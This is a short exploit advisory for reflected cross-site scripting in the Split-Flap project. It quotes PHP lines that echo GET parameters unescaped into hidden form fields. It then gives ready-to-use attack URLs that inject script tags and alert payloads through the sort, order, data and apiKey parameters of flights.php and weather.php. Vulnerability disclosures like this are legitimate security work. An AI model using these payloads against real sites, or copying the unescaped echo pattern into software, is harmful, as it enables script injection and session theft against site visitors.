Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php)
# Exploit Title: Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php)
# Date: 2016-06-10
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/baspete/Split-Flap , http://pete.basdesign.com/
# Software Link: https://github.com/baspete/Split-Flap/archive/master.zip
# Version: none(releases)
# Tested on: Debian [wheezy]
# CVE : none
### Vulnerability Details #####################################################
# The echo function in a and b are vulnerable.
#
# <!-- parameters -->
# <input type="hidden" name="data" value="<?php echo $_GET["data"] ?>" />
# <input type="hidden" name="sort" value="<?php echo $_GET["sort"] ?>" />
# <input type="hidden" name="order" value="<?php echo $_GET["order"] ?>" />
###############################################################################
### XSS1 - flights.php
Attack Code
http://127.0.0.1/vul_test/Split-Flap/flights.php?data=departures&sort=scheduled"><script>alert(45)</script>&order=as
weak parameters
- order
- sort
- data
### XSS2 - weather.php
Attack Code
http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey="%2Balert(45)%2B"a
http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey=</script><script>alert(45)</script>
weak parameters
- apikey
- data
### Vulnerability Details #####################################################
